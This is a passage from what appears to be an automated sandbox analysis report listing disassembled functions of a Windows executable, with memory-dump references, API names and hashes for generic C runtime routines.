                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: ErrorLast$abort
                                      • String ID:
                                      • API String ID: 1447195878-0
                                      • Opcode ID: aa022fa982e2ed3537eb5b9ce3cda2430ee51cfa5360f2d884ee3480038cf67a
                                      • Instruction ID: 72a12385daf9461edd3c67d7a4e2454958287449906c28271fc9f67f0a8d6d8d
                                      • Opcode Fuzzy Hash: aa022fa982e2ed3537eb5b9ce3cda2430ee51cfa5360f2d884ee3480038cf67a
                                      • Instruction Fuzzy Hash: 8B015AB070160542FA6BE7B7B5557FD52915B8C7C0F180439BB2647BF6ED3DC8444200
                                      Function 000000014000BBA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: FileHandleType
                                      • String ID: @
                                      • API String ID: 3000768030-2766056989
                                      • Opcode ID: 0616e5dfaf439c5fb8937a2e1fc8b67c147afd92221085602b892ce8d5d735ec
                                      • Instruction ID: 1694cbfd54b4703f42066c83f4144df38d78648c427efc7cd6c7404005ae1132
                                      • Opcode Fuzzy Hash: 0616e5dfaf439c5fb8937a2e1fc8b67c147afd92221085602b892ce8d5d735ec
                                      • Instruction Fuzzy Hash: D92194B2614B4081FB66CB2AA4D07A92691E78DBF4F281316E7AB077F4CF35C881D340
                                      Function 0000000140007FAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • try_get_function.LIBVCRUNTIME ref: 0000000140007FD5
                                      • TlsSetValue.KERNEL32(?,?,?,00000001400066D5,?,?,?,?,000000014000633C,?,?,?,?,0000000140004A2F), ref: 0000000140007FEC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: Valuetry_get_function
                                      • String ID: FlsSetValue
                                      • API String ID: 738293619-3750699315
                                      • Opcode ID: 2e5a8dc5f13499df812e2a5c805dbdc94ad4865d9a679619b0a0a90599d6e4b1
                                      • Instruction ID: 2af684bf997f0b770ee31f971a4a43a91b2c5b5a2078f5e7d0e9523b5698ab86
                                      • Opcode Fuzzy Hash: 2e5a8dc5f13499df812e2a5c805dbdc94ad4865d9a679619b0a0a90599d6e4b1
                                      • Instruction Fuzzy Hash: C1E039B160464981EB0A8B52B800BE82262AB8C7D4F485026FB190B3B6CE3DC9988210